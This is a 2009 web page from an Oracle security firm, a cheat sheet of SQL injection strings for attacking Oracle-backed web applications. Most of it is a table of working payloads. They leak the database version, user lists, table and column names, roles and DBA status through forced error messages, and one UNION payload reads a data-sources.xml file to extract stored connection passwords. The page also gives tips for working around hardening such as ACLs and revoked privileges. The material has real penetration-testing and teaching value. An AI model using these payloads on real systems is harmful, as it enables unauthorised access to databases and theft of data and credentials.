Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security

Oracle SQL Injection in web applications


Common SQL Injection Strings for Oracle Databases

Command

Description

Sample Picture

Common Problems

' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))-- Display the database version information in an error message (injected into a string)
[low privilege]
Demo picture
  • Java not installed
  • Oracle 11g ACL
  • PUBLIC privilege removed
==> use an alternative function
or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))-- Display the database version information in an error message (injected into an integer)
[low privilege]
Demo picture
  • Java not installed
  • Oracle 11g ACL
  • PUBLIC privilege removed
==> use an alternative function
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from all_users))-- Display a list of all usernames (11g only)
[low privilege]
Demo picture if stragg, it is possible to do the same using XMLDB. Soon here...
stragg is limited to 4096 bytes
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from all_users))-- Display a list of all user tables and the number of rows (11g only)
[low privilege]
Demo picture if stragg, it is possible to do the same using XMLDB stragg is limited to 4096 bytes
or 1=utl_inaddr.get_host_address((Select granted_role from ( select rownum r, granted_role from user_role_privs) where r=1)) Get the privileges of this account. Iterate via r=1, r=2, r=3, ...
[low privilege]
Demo picture
or 1=utl_inaddr.get_host_address((SELECT sys_context('USERENV', 'ISDBA') FROM dual)) or 1=utl_inaddr.get_host_address((SELECT sys_context((select chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||chr(78)||chr(86) from dual), (select chr(73)||chr(83)||chr(68)||chr(66)||chr(65) from dual)) FROM dual)) check if DBA, result: TRUE or FALSE
[low privilege]
Demo picture If the usage of single quotes returns an ORA-0911 (invalid character) you should use the second string
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct table_name||chr(58)||column_name||chr(58)||data_type||chr(58)||column_id||chr(59)) from user_tab_columns order by table_name,column_id))-- Get a list of all user tables including the column name and type
[low privilege]
union select extractvalue(value(c), '/connection-factory/@user')||'/'||extractvalue(value(c), '/connection-factory/@password')||'@'||substr(extractvalue(value(c), '/connection-factory/@url'),instr(extractvalue(value(c), '/connection-factory/@url'),'//')+2) conn
FROM table( XMLSequence( extract( xmltype( bfilename('GETPWDIR', 'data-sources.xml'), nls_charset_id('WE8ISO8859P1')), '/data-sources/connection-pool/connection-factory')) ) c
Read files from the operating system using a simple SQL statement.

Limitations:
Oracle Directory must exist
XML Files only


Oracle Common Commands:




String Concatenation

Description

'a' || 'b' concatenate 2 strings together. This syntax can be used for the split-and-balance technique.
concat('a','b') concatenate 2 strings together via the concat group.
TBD Read files in SELECT statements.
Blind SQL Injection

Generating Oracle Error Messages containing information:



String Concatenation

Message

Sample Picture
1 or 1 = ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)-- ORA-53044: Invalid Tag: ORACLE DATABASE 11G ENTERPRISE EDITION RELEASE 11.1.0.7.0 - PRODUCTION Demo picture ORDSYS
1 or 1= CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))-- ORA-20000: Oracle Text-Error: DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production does not exists Demo picture CTXSYS
will be continued
Related Information


© 2009 by Red-Database-Security GmbH - last update 04-feb-2009